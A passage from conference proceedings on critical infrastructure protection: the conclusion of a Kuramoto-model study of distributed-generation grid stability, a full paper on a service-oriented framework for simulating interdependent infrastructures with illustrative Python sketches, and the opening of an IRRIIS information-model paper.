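A power-law dependence of the rising time on Km can be checked by a linear fit in log-log space, as in the following sketch; the (Km, ts) pairs below are hypothetical placeholders, not the measured values behind Fig. 11.

```python
import numpy as np

# Hypothetical (K_m, rising-time) pairs, standing in for measured data.
K_m = np.array([0.5, 1.0, 2.0, 4.0, 8.0, 16.0])
t_s = np.array([40.0, 21.0, 10.5, 5.2, 2.7, 1.4])

# A power law t_s = c * K_m**alpha is a straight line in log-log space,
# so fit log(t_s) = alpha * log(K_m) + log(c) by least squares.
alpha, log_c = np.polyfit(np.log(K_m), np.log(t_s), 1)
print(f"estimated exponent alpha = {alpha:.2f}, prefactor c = {np.exp(log_c):.2f}")
```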
6 Conclusions
We discuss some stability issues of a DG power system modelled through a small (seven-node) network; the dynamics of the generators' phase angles have been described using a modified Kuramoto model [10], derived from the Cardell-Ilic model [6] by using the interaction scheme proposed by Filatrella [5]. Differently from those efforts, in our model the internode couplings are allowed to vary as square waves, with randomly chosen coupling amplitudes. Under these assumptions, we
observe that the system, for average coupling values, undergoes several synchronization losses from which, however, it is able to recover quickly. We have also shown that the rising time of synchronization follows a power law, in qualitative agreement with previously reported findings [8], [4]. Our results are also in agreement with recent findings of Popovych et al. [3]. They showed that, for N ≥ 4 and sub-critical Km, the SKM exhibits phase chaos as N increases, rapidly developing high-dimensional chaos for N = 10, where the largest Lyapunov exponent (LLE) reaches its maximum positive value. The LLE then decreases very fast, as 1/N, indicating a less chaotic regime. They conclude that an intermediate-size system (in terms of number of oscillators) can generate more intense phase chaos than small (N < 4) or large (N > 20) ones; our simulation [10] seems to confirm their conclusions (see Figs. 2, 3). Though their results have been obtained for the standard SKM (i.e., one fixed K), they seem to support the idea that intermediate values of N (5 < N < 20) should be avoided in order to obtain a robust phase-lock. In conclusion, the modified Kuramoto model seems able to describe a distributed generation network and its various instabilities, both in power amplitude and in frequency. Some useful indications can be derived: the coupling strength must be kept as high as possible, which means high-voltage transmission/distribution lines; the DG size (number of nodes) should be very small or very large; and the grid must ensure the coupling feedback actions by means of an appropriate topology. Simulations of the modified SKM with larger and more complex network topologies are planned.
Acknowledgements. The authors acknowledge fruitful discussions with R. Setola (Campus Bio-Medico). One of us (Silvia Ruzzante) acknowledges project CRESCO (PON 2000-2006, Misura II.2.a) for funding.
References

1. Chia, H., Ueda, Y.: Kuramoto Oscillators. Chaos, Solitons & Fractals 12, 159 (2001)
2. Kuramoto, Y.: Chemical Oscillation. Springer, Berlin (1984)
3. Popovych, O., et al.: Phase Chaos in Coupled Oscillators. Phys. Rev. E 71, 065201 (2005)
4. Carreras, B., et al.: Evidence for SOC in a Time Series of Electric Power System Blackouts. IEEE Trans. Circuits Syst. I 51, 1733 (2004)
5. Filatrella, G., et al.: Analysis of Power Grids using the Kuramoto Model. Eur. Phys. J. B 61, 485 (2008)
6. Cardell, J., Ilic, M.: Maintaining Stability with Distributed Generation. IEEE Power Eng. Soc. Meeting (2004)
7. Canale, E., Monzon, P.: Gluing Kuramoto Coupled Oscillators Networks. In: IEEE Decision and Control Conf., New Orleans (2007)
8. Moreno, Y., Pacheco, A.: Synchronization of Kuramoto Oscillators in Scale-Free Networks. Europhys. Lett. 68(4), 603 (2004)
9. Acebron, J., et al.: The Kuramoto Model. Rev. Mod. Phys. 77, 137 (2005)
10. Fioriti, V., Rosato, V., Setola, R.: Chaos and Synchronization in Variable Coupling Kuramoto Oscillators. Experimental Chaos Conference, Catania (2008)
11. http://www.iset.uni-kassel.de/publication/2007/2007 Power Tech Paper.pdf
12. Carsten, J., et al.: Riso Energy Report (2000)
13. Cardell, J., Ilic, M.: The Control of Distributed Generation. Kluwer Academic Press, Dordrecht (1998)
Enabling System of Systems Analysis of Critical Infrastructure Behaviors

William J. Tolone¹, E. Wray Johnson², Seok-Won Lee¹, Wei-Ning Xiang¹, Lydia Marsh¹, Cody Yeager¹, and Josh Blackwell¹

¹ The University of North Carolina at Charlotte, 9201 University City Blvd, Charlotte, NC 28223-0001, USA
² IntePoint, LLC, Charlotte, NC 28223-0001, USA
Abstract. Critical infrastructures are highly complex collections of people, processes, technologies, and information; they are also highly interdependent, with disruptions to one infrastructure commonly cascading in scope and escalating in impact across other infrastructures. While it is unlikely that disruptions can be prevented with certainty, an effective practice of critical infrastructure analysis can reduce their frequency and/or lessen their impact. We contend that proper critical infrastructure analysis necessitates a system of systems approach. In this paper, we identify requirements for integrated modeling and simulation of critical infrastructures. We also present our integrated modeling and simulation framework, based on a service-oriented architecture, that enables system of systems analysis of such infrastructures.
1 Introduction
Critical infrastructures are those systems or assets (e.g., electric power and telecommunication systems, hospitals) that are essential to a nation's security, economy, public health, and/or way of life [9]. The blackout in the northeast United States and southeast Canada in 2003, the hurricane damage in Louisiana and Texas in 2005, and numerous other smaller scale occurrences demonstrate the potentially catastrophic impacts of critical infrastructure disruptions. While it is unlikely that disruptions can be prevented with certainty, an effective practice of critical infrastructure analysis can reduce their frequency and/or lessen their impact by improving vulnerability assessments, protection planning, and strategies for response and recovery. In [17], it is argued that proper critical infrastructure analysis must account for the situated nature of infrastructures by incorporating into analysis the spatial, temporal, and functional context of each infrastructure. It is also argued that proper critical infrastructure analysis must account for the multi-dimensional nature of infrastructures by accounting for both the engineering and behavioral properties of each infrastructure. Engineering properties are the underlying physics-based properties that shape and constrain the operation of an infrastructure. Behavioral properties are the relational properties that emerge from
business processes, decision points, human interventions, participating information, etc. of an infrastructure.¹ These two characteristics contribute to making critical infrastructure analysis a "wicked problem" [15]. Wicked problems are non-linear problems that are without definitive formulations. Such problems have an open solution space where solutions have relative quality. Furthermore, each problem instance is arguably unique. We contend that the situated and multi-dimensional natures of critical infrastructures and the "wickedness" they introduce to analysis necessitate a system of systems approach to critical infrastructure analysis. System of systems analysis is appropriate for understanding large-scale, highly complex phenomena that are comprised of highly interdependent participating systems, which themselves may be large-scale and highly complex. Such a phenomenon is described as a system of systems when the behavior of the system is reflected in the emergent, synergistic behaviors of the participating systems. Critical infrastructure systems possess these characteristics as each infrastructure system is a highly complex collection of people, processes, technologies, and information. In addition, critical infrastructures are highly interdependent where disruptions in one infrastructure commonly cascade in scope and escalate in impact across other infrastructures [14]. As such, to analyze one of these infrastructures properly requires a system of systems analysis of all of these infrastructures. To meet this challenge, integrated modeling and simulation has emerged as a promising methodology to support system of systems analysis of critical infrastructures. However, integrated modeling and simulation necessitates both: 1) a proper representation of the situated, multi-dimensional nature of critical infrastructures; and 2) a proper integration framework and methodology for system of systems analysis. In [17], a representation of infrastructure context and behavior for integrated modeling and simulation is presented. In this paper, however, we examine the latter issue, the challenge of designing a proper integration framework for the modeling and simulation of critical infrastructures. The primary contributions of the work reported here are: 1) we identify emerging integrated modeling and simulation requirements for system of systems analysis of critical infrastructures; 2) we demonstrate the application of a service-oriented architecture to the challenge of integrated modeling and simulation of critical infrastructures; and, 3) we illustrate how this framework enables system of systems analysis of critical infrastructures. The structure of this paper is as follows. We begin by exploring related work in critical infrastructure modeling and simulation. Next, we examine emerging requirements for integrated modeling and simulation of critical infrastructures. We then present our framework for integrated modeling and simulation based on the popular service-oriented architecture. We conclude by providing an illustration that demonstrates system of systems analysis of critical infrastructures using our framework. Lastly, we provide a summary and discuss future work.
¹ Casalicchio et al. [2] provide an analogous description of the situated and multi-dimensional natures of critical infrastructures to that found in [17] in their discussion of the horizontal and vertical partitioning of federated models.
2 Related Work
Numerous approaches to critical infrastructure modeling and simulation have been explored. A comprehensive survey of current solutions conducted in 2006 highlights several of these approaches [11]. One approach to critical infrastructure modeling and simulation is to focus analysis on the exploration of single, isolated infrastructures, e.g., [1,4,13]. However, this non-integrated approach to modeling and simulation fails to recognize the situated nature of critical infrastructures. Furthermore, this approach does not offer a generalized way to fuse independent analyses. Another approach to critical infrastructure modeling and simulation is to focus on the interdependencies among infrastructures, e.g., [5,7]. Though not an integrated approach to modeling and simulation, this approach recognizes the situated nature of critical infrastructures. However, it does not adequately incorporate into the analysis the underlying multi-dimensional nature of each infrastructure. While dependencies among critical infrastructures can lead to cascading effects with escalating impacts [14], such effects and impacts often emerge from the interplay between these dependencies and the multi-dimensional behavior of each infrastructure. By focusing only on infrastructure interdependencies, the fidelity of the analysis is greatly reduced. Still another approach to critical infrastructure modeling and simulation is to build comprehensive models of critical infrastructures, e.g., [3,6,8,14,16]. However, this approach is not necessarily tractable due to the unique characteristics of each infrastructure. As a result, comprehensive models typically emphasize high-level analysis. Finally, a more recent approach to critical infrastructure modeling and simulation focuses on the development of what Pederson et al. [11] describe as a coupled modeling approach, e.g., [2,17,18]. Under this approach, individual infrastructure models are integrated in a generalized way with models of infrastructure dependencies to enable system of systems analysis, thus coupling the fidelity of individual infrastructure models with the requirement for situated analysis. The promise of a coupled approach to critical infrastructure modeling and simulation highlights the challenge of designing a proper integration framework. Specifications for such frameworks have been developed. For example, the IEEE Standard 1516 High-Level Architecture (HLA) for modeling and simulation presents one such specification. The HLA specification is comprised of federates (which could model individual infrastructures), an object model (which defines a vocabulary for discourse among federates), and a run-time interface and infrastructure (which enable interaction among federates).
3 Modeling and Simulation Requirements for System of Systems Analysis of Critical Infrastructures
Enabling system of systems analysis of critical infrastructures presents many challenges. We describe a specific set of these challenges by identifying associated requirements for integrated modeling and simulation of critical infrastructures.
Requirement #1: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized approach to model integration. Critical infrastructure analysis requires the participation of a dynamic set of infrastructure models. Evolving analysis requirements will necessitate the plug-n-play of different representations of the same infrastructure as well as different collections of infrastructure models. Requirement #1 highlights the importance of a uniform approach to model integration to account for changing requirements.

Requirement #2: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized method for infrastructure model discovery. Critical infrastructure analysis is shaped not only by evolving requirements, but also by infrastructure model availability. Requirement #2 emphasizes the need for a uniform approach to discovering infrastructure models to afford this dynamism.

Requirement #3: Modeling and simulation solutions for critical infrastructure analysis should provide a generalized method for infrastructure model configuration. Often critical infrastructure models are not static representations, but are configurable to afford a range of behaviors for comparative analysis, to address issues of precision, and to manage computation and performance tradeoffs. Requirement #3 articulates the need for a generalized approach to configuring the parameterized aspects of infrastructure models.

Requirement #4: Modeling and simulation solutions for critical infrastructure analysis should provide a method for infrastructure model mapping and mediation. Critical infrastructures are highly interdependent. Events within one infrastructure produce effects within other infrastructures. As such, Requirement #4 highlights the importance of a uniform approach to mapping and mediating interactions among models, so that dependencies across infrastructures can be accounted for.

Requirement #5: Modeling and simulation solutions for critical infrastructure analysis should provide a method for supporting emergent critical infrastructure behaviors. Situating critical infrastructure analysis requires more than the ability to link infrastructure models. Properly situating analysis also requires a method for supporting emergent critical infrastructure behaviors. These behaviors are not present within individual infrastructures; nor do they emerge due to simple cross-infrastructure dependencies. Rather, they appear from the synergy of interacting infrastructures.

Requirement #6: Modeling and simulation solutions for critical infrastructure analysis should provide a method for registering interest in temporal events and model events. Events within one infrastructure often produce effects within other infrastructures. To mediate this interplay, a method for registering interest in model events is required. In addition, infrastructure behavior may vary with time; e.g., energy demands at 3:00pm on a hot summer day are different from those at 2:00am on a cool spring night. As such, a method to make infrastructure models temporally aware is required.

Requirement #7: Modeling and simulation solutions for critical infrastructure analysis should provide a method for accommodating differing simulation
methodologies. Different infrastructure models may leverage different simulation methodologies. For example, some models leverage a discrete simulation methodology while other models leverage a continuous simulation methodology. Requirement #7 highlights the necessity for an approach to mediate the differences among simulation methodologies.
4 A Service-Oriented Framework for Integrated Modeling and Simulation
Given the diversity and complexity of individual infrastructure models, we contend that a key to enabling integrated modeling and simulation of critical infrastructures is simplicity in the design of the integration framework. Service-oriented architectures (SOAs) embody this simplicity and provide a promising approach to integrated modeling and simulation. SOAs are an emerging approach for enterprise application design and business function integration [10,12]. Structurally, such architectures are characterized by three component roles: service providers, service requesters, and service registries. Service providers implement some business functionality and expose this functionality through a public interface. Service requesters leverage needed business functionality through these public interfaces. Service registries broker the discovery of business functionality by service requesters. Functionally, SOAs are characterized by two distinct mechanisms: mechanisms that facilitate business function registration/discovery, and mechanisms that exercise business functions through requester/provider interaction (see Fig. 1). SOAs are also known for their configurability, extensibility, and scalability: they enable the dynamic aggregation of different functionality (configurability); they facilitate the introduction of new functionality (extensibility); and they accommodate varying numbers of providers, requesters, and registries (scalability). Given these characteristics, the simplicity of the SOA design, and the aforementioned modeling and simulation requirements, SOAs serve as the design foundation for our integrated modeling and simulation framework to enable system of systems analysis of critical infrastructures. Our framework is highlighted by four important design elements: 1) the instantiation of the SOA component roles; 2) a common service provider interface (SPI); 3) the service registration and
Fig. 1. Service-Oriented Architecture
discovery method; and 4) the simulation execution protocol. Collectively, these design elements address, to varying degrees, the identified modeling and simulation requirements.

4.1 SOA Component Roles
As previously described, SOAs comprise three component roles: service providers, service requesters, and service registries. Within our integrated modeling and simulation framework, individual infrastructure models function as our service providers. Our Integrated Modeling Environment (IME) functions in the role of service requester. The service registry is enabled by a configuration file and the underlying file system (see Fig. 2).
Fig. 2. Integrated Modeling and Simulation Framework
Service providers participate in multi-infrastructure simulations by implementing a Connector that realizes the common SPI. This allows service requesters to interact with all infrastructure models using a common interface. Given, however, that infrastructure models are often configurable (e.g., PowerWorld Simulator [13] allows end users to select different solvers), each Connector may define a set of configurable properties. Configurable properties must be assigned a valid value before a Connector, and the infrastructure model it represents, can participate in multi-infrastructure simulations. Together, the common SPI and Connector properties provide a generalized approach for infrastructure model interaction, while enabling infrastructure model configuration, i.e., Requirements #1 and #3.

4.2 Service Registration and Discovery Method
To participate in integrated simulations, infrastructure models must register with our framework. First, service providers add entries for their infrastructure
models to a configuration file and place relevant software assemblies in specified file directories. The configuration file and supporting file directories provide the IME a means to discover infrastructure models automatically, i.e., Requirement #2. Next, service providers expose their infrastructure model data to the IME. This occurs for several reasons: development of a common intermediate representation is needed in order to support the specification of cross-infrastructure dependencies, i.e., Requirement #4; awareness of these data facilitates support for emergent infrastructure behaviors, i.e., Requirement #5; and exposing relevant infrastructure data enables the IME to generate a unified visualization for the region of interest. Infrastructure model registration and discovery concludes with the IME possessing a set of Connectors, where each Connector encapsulates access to an infrastructure model.

4.3 Common Service Provider Interface
Interaction with infrastructure models presents special challenges to integrated simulations. First, to address the need for a generalized approach to model integration, i.e., Requirement #1, our framework defines a common SPI for all infrastructure models. The simplicity of our common SPI is one aspect of our framework that distinguishes it from the HLA by reducing the complexity of Connector/federate design. The common SPI also allows infrastructure models to register interest in selected temporal events and model events, i.e., Requirement #6. In the following, we introduce the common SPI.

Connect(); When a user wishes to conduct system of systems analysis of critical infrastructures by means of multi-infrastructure simulations, the IME (i.e., service requester) "connects" to all enabled Connectors. The connection process accomplishes two things. First, it initializes each infrastructure model with a timestamp indicating the simulation start time. Second, it allows each infrastructure model, in response, to register interest in relevant temporal events and model events, i.e., Requirement #6.

Disconnect(); When a simulation is complete, the IME "disconnects" from the participating infrastructure models.

GetState(); Before a simulation begins, the IME requests from each infrastructure model the operational state of infrastructure components. This interaction between the IME and the infrastructure models synchronizes the state of IME data with each infrastructure model. In response to a GetState() request, an infrastructure model will report to the IME the requested state attributes for the requested infrastructure features.

SetState(); When infrastructure models or the IME model of infrastructure dependencies indicate that the state of an infrastructure feature should change (i.e., disabled to enabled, or enabled to disabled), the SetState() operation is invoked on the relevant infrastructure model. In response, an infrastructure model will report the plausible effects of the state change as a set of subsequent change events. These events are scheduled in the IME simulation timeline for processing.
ClockAdvanceRequest(); This functionality is required due to the behavior of some infrastructure models. Some infrastructure models require, as much as possible, that all change events for a given timestamp be processed in batch. Thus, when the IME has processed all events associated with the current time on the simulation clock, each infrastructure model is notified and a request is made for approval to advance the time clock. In response, an infrastructure model returns the plausible effects of queued events as a set of subsequent change events. These events are scheduled in the IME simulation timeline for future processing.

AdvanceClock(); When the simulation time clock reaches a relevant temporal event, interested infrastructure models are notified of this event using the AdvanceClock() operation.
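For illustration, the common SPI could be rendered as an abstract interface along the following lines. Only the operation names come from the paper; the parameter lists and return values are assumptions, since full signatures are not given.

```python
from abc import ABC, abstractmethod

class Connector(ABC):
    """Sketch of the common SPI realized by every infrastructure model's
    Connector. Parameters and return values are illustrative assumptions.
    """

    @abstractmethod
    def connect(self, start_time):
        """Initialize the model with the simulation start time; the model
        responds by registering interest in temporal and model events."""

    @abstractmethod
    def disconnect(self):
        """Release the model once the simulation is complete."""

    @abstractmethod
    def get_state(self, features, attributes):
        """Report the requested state attributes for the requested
        infrastructure features (IME/model state synchronization)."""

    @abstractmethod
    def set_state(self, feature, enabled):
        """Apply a state change and return its plausible effects as a set
        of subsequent change events for the IME simulation timeline."""

    @abstractmethod
    def clock_advance_request(self, current_time):
        """Approve clock advancement, returning the plausible effects of
        events queued for batch processing at the current timestamp."""

    @abstractmethod
    def advance_clock(self, new_time):
        """Notify the model of a temporal event it registered interest in."""
```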
4.4 Simulation Execution Protocol
The simulation execution protocol supported by the integrated modeling and simulation framework enables event-driven, i.e., discrete, simulations. The IME, as service requester, maintains a simulation clock and an ordered simulation timeline of events. The IME also realizes the following simulation execution protocol. At the beginning of a simulation, the IME connects, via the Connect() operation, to each enabled Connector, i.e., infrastructure model. Each Connector responds with infrastructure and temporal events of interest. Next, the IME synchronizes its state with each infrastructure model using the GetState() operation. Every simulation is associated with a course of action (COA). A COA identifies the infrastructure events that are "scheduled" to occur during the simulation. These events are inserted into the simulation timeline. Thus, in the timeline there may be three types of events: scheduled infrastructure events (called actions), emergent infrastructure events (resulting from event processing), and temporal events. Simulation execution begins by processing the "current" events. Processing either a scheduled or an emergent event involves two parts. First, a state change is effected in the relevant infrastructure model using the SetState() operation. This operation will return a list of emergent events, which are properly inserted into the simulation timeline by the IME. If the state change is not effected because the relevant infrastructure model already possesses the desired state, the event is retained but processing of the event terminates. Second, if the event results in a state change, then the infrastructure event is processed according to the relational model specified in the IME context and behavior ontology [17]. Processing a temporal event requires the IME to use the AdvanceClock() operation to notify interested infrastructure models. Once all "current" events have been processed, the IME interacts with each infrastructure model using the ClockAdvanceRequest() operation to request approval for the advancement of the simulation clock. If no new "current" events are generated from these requests, then the simulation clock is advanced to the next timestamp at which either a scheduled, emergent, or temporal event is to occur.
When no unprocessed events remain in the simulation timeline, the IME disconnects from each infrastructure model using the Disconnect() operation, and the simulation terminates. While this framework supports discrete simulations, its design does not necessarily prevent the integration of infrastructure models that support continuous simulations. This is possible because the IME "knows" about infrastructure models only through the common SPI. Thus, the framework encapsulates infrastructure model behavior in a manner that hides the service provider's simulation methodology, e.g., discrete or continuous, from service requesters. As such, continuous simulations can be embedded within multi-infrastructure discrete simulations. For example, using our framework we have integrated electric power simulations, supported by PowerWorld Simulator, which uses a continuous simulation approach, into multi-infrastructure discrete simulations. Thus, the design of the SPI and the encapsulation of infrastructure models provide an approach to address Requirement #7. The simulation execution protocol is another aspect that distinguishes our framework from the HLA. While the HLA is designed to allow a full range of distributed interaction among federates, including both synchronous and asynchronous interaction, our integration framework centralizes interaction through the IME using a well-defined synchronous interaction protocol. Furthermore, the IME centralizes management of the simulation clock. While these characteristics restrict the range of interaction among Connectors, we believe the simplicity of this design and the common SPI will increase the usability and utility of the integration framework.
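The protocol can be condensed into a single event loop, as in the following sketch. The timeline representation (a heap of timestamped entries) and the event fields (kind, connector, feature, enabled) are illustrative assumptions layered on the Connector interface sketched above, not the IME's actual implementation.

```python
import heapq
import itertools

def run_simulation(connectors, coa_events, start_time):
    """Condensed sketch of the IME's discrete, event-driven protocol.
    `coa_events` are (timestamp, event) pairs scheduled by the COA.
    """
    seq = itertools.count()                    # tie-breaker for equal timestamps
    timeline = []

    def schedule(timestamp, event):
        heapq.heappush(timeline, (timestamp, next(seq), event))

    for timestamp, event in coa_events:        # scheduled actions from the COA
        schedule(timestamp, event)
    for c in connectors:                       # Connect(): models register interest
        for timestamp, event in c.connect(start_time):
            schedule(timestamp, event)
    for c in connectors:                       # GetState(): synchronize IME state
        c.get_state(features=None, attributes=None)

    while timeline:
        clock, _, event = heapq.heappop(timeline)
        if event.kind == "temporal":           # AdvanceClock() notification
            event.connector.advance_clock(clock)
        else:                                  # scheduled or emergent event
            for ts, ev in event.connector.set_state(event.feature, event.enabled):
                schedule(ts, ev)               # insert plausible effects
        if not timeline or timeline[0][0] > clock:
            # all "current" events processed: request approval to advance
            for c in connectors:
                for ts, ev in c.clock_advance_request(clock):
                    schedule(ts, ev)

    for c in connectors:                       # Disconnect(): simulation ends
        c.disconnect()
```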
5 Illustration
To demonstrate how our framework for integrated modeling and simulation enables system of systems analysis of critical infrastructures, an illustration is provided. This illustration focuses on an urban region, possessing infrastructures for electric power, telecommunication, and rail transportation (see Fig. 3).
Fig. 3. Illustrative Infrastructure Models
In this illustration, independent models for electric power, telecommunication, and rail transportation have been incorporated into our framework as service providers. In other words, a Connector that realizes the common SPI has been implemented for each infrastructure model. Using the IME ontology for infrastructure context and behavior [17], temporal, spatial, and functional relationships within and among the infrastructure models are also specified. Fig. 4 depicts the order of effect for an illustrative multi-infrastructure simulation. The initial state of this simulation has all three participating infrastructures enabled. The course of action for this simulation includes one scheduled event: a fallen power line, i.e., 1st order effect. Loss of this power line leads to a power outage in the specified region, i.e., 2nd order effect. This power outage forces a telecommunications central office to migrate to backup power. After backup power is exhausted, however, the central office is disabled, which, in turn, disables connected wireless towers, i.e., 3rd order effect. The subsequent loss of telecommunications affects rail transportation as indicated, since the rail infrastructure depends on the telecommunication infrastructure to operate rail switches, i.e., 4th order effect. The simulation final state is also shown. Once simulations complete, they may be explored, replayed, and saved for further analysis. Using the IME, users can examine the order-of-impact of events as well as the plausible impact on each critical infrastructure. In addition, users can examine the event trace to understand and/or validate the event chain that led to an effect. During analysis, users may refine the infrastructure context and behavior ontology, reconfigure infrastructure models, and add/remove/plug-n-play different infrastructure models to explore "what-if" scenarios.
Fig. 4. Illustrative Multi-infrastructure Simulation
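The order-of-effect chain of this scenario can be reduced, for illustration, to a fixed-point propagation over a dependency map. The feature names and edges below are distilled from the narrative; the IME's ontology-driven processing (timing, backup-power duration, event traces) is of course far richer.

```python
# Hypothetical feature names and dependency edges from the scenario above.
depends_on = {
    "regional power":  ["power line"],        # 2nd order effect
    "central office":  ["regional power"],    # 3rd order (once backup power is exhausted)
    "wireless towers": ["central office"],    # 3rd order
    "rail switches":   ["central office"],    # 4th order
}

def cascade(failed):
    """Propagate failures to a fixed point through the dependency map."""
    changed = True
    while changed:
        changed = False
        for feature, deps in depends_on.items():
            if feature not in failed and any(d in failed for d in deps):
                failed.add(feature)
                changed = True
    return failed

print(sorted(cascade({"power line"})))
# -> ['central office', 'power line', 'rail switches', 'regional power', 'wireless towers']
```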
For this illustration, three infrastructure models were integrated using our SOA framework for integrated modeling and simulation. Due to obvious data sensitivities, notional data were intermixed with actual data. To date, we have used our framework to integrate numerous infrastructure models, including models supported by third-party solutions such as PowerWorld Simulator [13] and Network Analyst [1]. We have also developed a toolkit of Connectors to enable rapid prototyping of infrastructure models (no Connector development required), which is useful when model data are relatively sparse. The resulting models, however, are still known to the IME only through the common SPI. Finally, we have coupled continuous infrastructure simulations, e.g., [13], into discrete multi-infrastructure simulations.
6 Conclusion
Our framework for integrated modeling and simulation is actively being used to explore and analyze critical infrastructures for large-scale (>100,000 km²) geographic regions. In addition, we have developed integrated models for urban regions of various scales (e.g., >500 mi², 1000 acres). We have also demonstrated the IME on a corporate IT infrastructure model for a Fortune 100 company, integrating models for IT hardware, system software, business applications, business processes, and business units. Verification and validation are further enabled by our adherence to the underlying principle of transparency. Analysis enabled by our framework is transparent to the analyst. Event traces can be explored and questioned by subject matter experts. In fact, this practice is regularly utilized by our user community. At the same time, there are aspects of our framework that require further investigation. First, the robustness of our common SPI and simulation execution protocol must be examined. The SPI and simulation execution protocol have undergone some revisions since their initial design to address emergent requirements of individual infrastructure models. For example, the ClockAdvanceRequest() operation was introduced after discovering that some infrastructure models require, as much as possible, that all change events for a given timestamp be processed in batch. Second, Connector developers are currently responsible for mapping infrastructure model data into a common intermediate representation. This increases the complexity of Connector development while simplifying the design of the IME. Further study is required to determine and validate the proper balance of this responsibility between the Connector developer and the IME. Third, further research is required to validate the integrated modeling and simulation requirements identified in Section 3. These requirements emerged through both research and practice. Additional research is required to determine the completeness and appropriateness of this set. Finally, formal study of the scalability and complexity of our framework from a cognitive perspective is required. That is, a better understanding is needed of how our framework impacts (positively and/or negatively) the cognitive limitations of the developers of integrated models for system of systems analysis.
References

1. ArcGIS Network Analyst, http://www.esri.com/software/arcgis/extensions/networkanalyst
2. Casalicchio, E., Galli, E., Tucci, S.: Federated agent-based modeling and simulation approach to study interdependencies in IT critical infrastructures. In: 11th IEEE Symp. on Distributed Simulation & Real-Time App. IEEE Computer Society, Los Alamitos (2007)
3. Chaturvedi, A.: A society of simulation approach to dynamic integration of simulations. In: Proc. Winter Simulation Conference (2006)
4. Craven, P., Oman, P.: Modeling advanced train control system networks. To appear in: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, 2nd edn. (2008)
5. Dudenhoeffer, D.D., Permann, M.R., Manic, M.: CIMS: a framework for infrastructure interdependency modeling and analysis. In: Winter Simulation Conf. (2006)
6. Flentge, F., Beyer, U.: The ISE metamodel for critical infrastructures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, pp. 323–336. Springer, Heidelberg (2007)
7. Gursesli, O., Desrochers, A.A.: Modeling infrastructure interdependencies using petri nets. In: IEEE Int'l Conference on Systems, Man and Cybernetics (2003)
8. Marti, J.R., Hollman, J.A., Ventura, C., Jatskevich, J.: Design for survival real-time infrastructures coordination. In: Int'l Workshop Complex Network & Infrastructure Protection (2006)
9. National Strategy for Homeland Security, U.S. Dept. of Homeland Security (2002)
10. Papazoglou, M.P., Georgakopoulos, D.: Service-oriented computing. Communications of the ACM 46, 10 (2003)
11. Pederson, P., Dudenhoeffer, D., Hartley, S., Permann, M.: Critical infrastructure interdependency modeling: a survey of U.S. and international research. Rep. No. INL/EXT-06-11464, Critical Infrastructure Protection Division, INEEL (2006)
12. Perrey, R., Lycett, M.: Service-oriented architecture. In: Proc. of Symp. on Applications and the Internet Workshops, pp. 116–119 (2003)
13. PowerWorld Simulator, http://www.powerworld.com/products/simulator.asp
14. Rinaldi, S.M., Peerenboom, J.P., Kelly, T.K.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine (2001)
15. Rittel, H., Webber, M.: Dilemmas in a general theory of planning. Policy Sciences 4, 155–169. Elsevier Scientific Publishing, Amsterdam (1973)
16. Svendsen, N., Wolthusen, S.: Multigraph dependency models for heterogeneous critical infrastructures. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection, pp. 337–350. Springer, Heidelberg (2007)
17. Tolone, W.J., Lee, S.W., Xiang, W.N., Blackwell, J., Yeager, C., Schumpert, A., Johnson, E.W.: An integrated methodology for critical infrastructure modeling and simulation. In: Goetz, E., Shenoi, S. (eds.) Critical Infrastructure Protection II. Springer, Heidelberg (2008)
18. Tolone, W.J., Wilson, D., Raja, A., Xiang, W.N., Hao, H., Phelps, S., Johnson, E.W.: Critical infrastructure integration modeling and simulation. In: Chen, H., Moore, R., Zeng, D.D., Leavitt, J. (eds.) ISI 2004. LNCS, vol. 3073, pp. 214–225. Springer, Heidelberg (2004)
Information Modelling and Simulation in Large Interdependent Critical Infrastructures in IRRIIS

Rüdiger Klein, Erich Rome, Césaire Beyel, Ralf Linnemann, Wolf Reinhardt, and Andrij Usov

Fraunhofer IAIS, Schloss Birlinghoven, Sankt Augustin, Germany
{Ruediger.Klein}@iais.fraunhofer.de
Abstract. Critical Infrastructures (CIs) and their protection play a very important role in modern societies. Today's CIs are managed by sophisticated information systems. These information systems have special views on their respective CIs, but frequently cannot adequately manage dependencies with other systems. For dependency analysis and management we need information that takes the dependency aspects explicitly into account, in well-defined relation to all other relevant kinds of information. This is the aim of the IRRIIS Information Model. It is a semantic model, or ontology, of CI dependencies. This Information Model allows us to integrate information from different CIs, whether from real ones as in SCADA systems or from simulations, in order to manage their interdependencies. This paper gives an overview of the IRRIIS Information Model and the way it is used in the IRRIIS simulator SimCIP for the analysis of interdependent infrastructures. An example is given to illustrate our approach.

Keywords: CI dependability, CI dependencies, information modelling, federated simulation, simulation environment.
1 Introduction
Critical infrastructure systems are getting more and more complex. At the same time, their (inter-)dependencies grow. Interactions through direct connectivity, through policies and procedures, or simply as the result of geographical neighbourhood often create complex relationships, dependencies, and interdependencies that cross infrastructure boundaries. In the years to come, the number, diversity, and importance of critical infrastructures as well as their dependencies will continue to increase: advanced traffic management and control systems, mobile information services of any kind, ubiquitous computing, ambient intelligence, to mention just a few key words. Even classical domains like electric power networks will change their shape: more distributed generation facilities, intelligent consumers, and smaller but interdependent distribution networks are examples of developments to be expected. The good news is that more or less all
of these critical infrastructures provide and use many kinds of information during operation. This allows us to use this information also for interdependency analysis and management. The modelling and analysis of dependencies between critical infrastructure elements is a relatively new and very important field of study [2]. Much effort is currently being spent on developing models that accurately simulate the behaviours of critical infrastructures [12, 14, 15]. Today, comprehensive knowledge about managing large and complex systems already exists. There are sophisticated approaches dealing with optimal operation, management of interoperation, safety and risk management issues, etc. Different modelling and problem-solving approaches are considered [2], including agent-based modelling, game theory, mathematical models, Petri nets, statistical analysis, etc. One of the main challenges for managing CIs and their dependencies comes from the quite different kinds of behaviour of critical infrastructures. Electrical power networks, traffic systems, water and oil pipelines, logistics, or telecommunication systems have the information and communication systems needed for their control, but at the same time they exist in the physical world, they behave according to the laws of physics, and they interact with their physical environment. The management of many critical infrastructures has to take both dimensions and their mutual interactions into account: the physical and the information and communication aspect. For this purpose we need

– information models which are sufficiently expressive for CI dependency modelling and analysis, for the physical as well as the information and control aspects and their relationships;
– simulation techniques which allow us to describe the physical behaviour of the different systems, their control, and the resulting dependencies; and
– methods and tools supporting communication between CIs in order to manage their dependencies.

